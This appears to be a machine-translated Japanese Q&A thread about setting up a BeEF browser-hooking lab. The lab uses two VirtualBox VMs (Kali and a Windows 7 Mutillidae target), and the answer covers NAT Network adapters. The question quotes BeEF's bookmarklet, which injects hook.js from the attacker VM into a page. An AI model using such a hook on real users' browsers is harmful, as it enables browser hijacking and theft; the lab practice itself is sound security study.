NAT VirtualBoxのネットワークで別のVMのブラウザーにビーフフックを設定する方法

Question

「実用的なウェブ侵入テスト」を読んでいます。 VirtualBoxを使用して2つのVMを実行しています。Mutillidaeを搭載したWindows 7とBeefを使用するKaliLinuxです。どちらもNat Network 10.0.2.0/24に接続されています。

この本で述べられているように、KaliLinuxは_/etc/network/interfaces_を変更して静的IPを持つように設定しました。

_source /etc/network/interfaces.d/* # The loopback network interface auto lo iface lo inet loopback #Static IP Address auto eth0 iface eth0 inet static address 10.0.2.99 netmask 255.255.255.0 network 10.0.2.0 broadcast 10.0.2.255 gateway 10.0.2.1 _

私のWindows VMにはIP 10.0.2.4があります。

私は今、牛肉を準備しようとしています。これらの各VMブラウザーでタブを開いて_http://10.0.2.99:3000/demos/basic.html_にアクセスすると、ブラウザーがオンラインブラウザーとしてbeef uiパネルにフックされます。

しかし、私はムティリダエにフックを持ちたいです。ブックマークとしてコピーして、特定のWebページのhook.jsファイルを追加するためのボタンがあります：javascript: (function () { var url = 'http://10.0.2.99:3000/hook.js';if (typeof beef == 'undefined') { var bf = document.createElement('script'); bf.type = 'text/javascript'; bf.src = url; document.body.appendChild(bf);}})();

どちらかのVMブラウザで実行すると、_http://10.0.2.4/mutillidae/index.php_で開かれますが、機能しません。 _hook.js_ファイルは読み込まれません。Firebugで確認できます。しかし、ブラウザが「フック」されることはありません。牛肉パネルには表示されません。

_/etc/beef-xss/config.yaml_のこの部分も変更しました：

_# Reverse Proxy / NAT # If BeEF is running behind a reverse proxy or NAT # set the public hostname and port here public: "10.0.2.99" # public hostname/IP address #public_port: "" # experimental _

そして、いくつかの研究をしましたが、何もしませんでした...

奇妙なもの（またはそれは正常ですか？）：

Kali 10.0.2.99から

_ping 10.0.2.99 - OK ping 10.0.2.4 - KO --> But I can access 10.0.2.4/mutillidae/ ! ping 10.0.2.1 - OK ping 10.0.2.0 -b - KO --> shouldn't I get answers from myself and gateway at least? _

W7 10.0.2.4以降

_ping 10.0.2.99 - OK --> So it works in that direction but not in the other? And I can access beef's panel, demo, or hook.js ping 10.0.2.4 - OK ping 10.0.2.1 - OK ping 10.0.2.0 - KO --> Reply from 10.0.2.4: Destination Host unreachable. Is this why Kali can't access W7? _

Win7のMutillidaeにフックを設定できないのはなぜですかVM Kaliと同じNat Networkに接続されているVM running beef？ =

ありがとう。

私を助けるために詳細が必要な場合は、ためらわないでください。私の質問を編集して、あなたが私を助けるのを助けます。

OscarAkaElvis · Answer

私は通常、2つの仮想マシン間でハッキングテストを行うときに、それぞれに2つのアダプタをセットアップします。まずはそれぞれ「NAT」として。そのインターフェースは私のホストを介してインターネットアクセスを提供します（ただし、NATネットワークはvmごとに異なるネットワークになることを知っている必要があります）。2番目のインターフェースは「NATネットワーク」となり、仮想マシンが共有するネットワーク。

このセカンダリネットワークインターフェースをセットアップするには、まずVirtualboxでNatNetworkの範囲をセットアップする必要があります。「ファイル」、「設定」、「ネットワーク」をクリックします。プラス記号をクリックして作成します。「NatNetwork」として設定されます。次に、歯車アイコンをクリックして構成します。私のスクリーンショットを確認できます（申し訳ありませんが、スクリーンショットはスペイン語です）：

vm1

次に、それを構成して、任意のネットワーク範囲を設定できます。この場合は、競合しない範囲にするために12.0.0.0/24を使用します。

vm2

その後、各仮想マシンにセカンダリネットワークインターフェースをセットアップする必要があります。 vm、設定、ネットワークをクリックし、「Nat Network」と作成したネットワークを選択するセカンダリネットワークインターフェースを有効にします。

vm3

両方のマシンでこれを行うと、マシンは12.0.0.0/24ネットワーク上にセカンダリネットワークインターフェースを持ち、そのネットワーク上で他のマシンを問題なく認識します。 DHCPによってIPを取得し、ハッキングテストを実行できます。

もちろん、これを行う方法は他にもありますが、これは簡単で機能します。幸運を。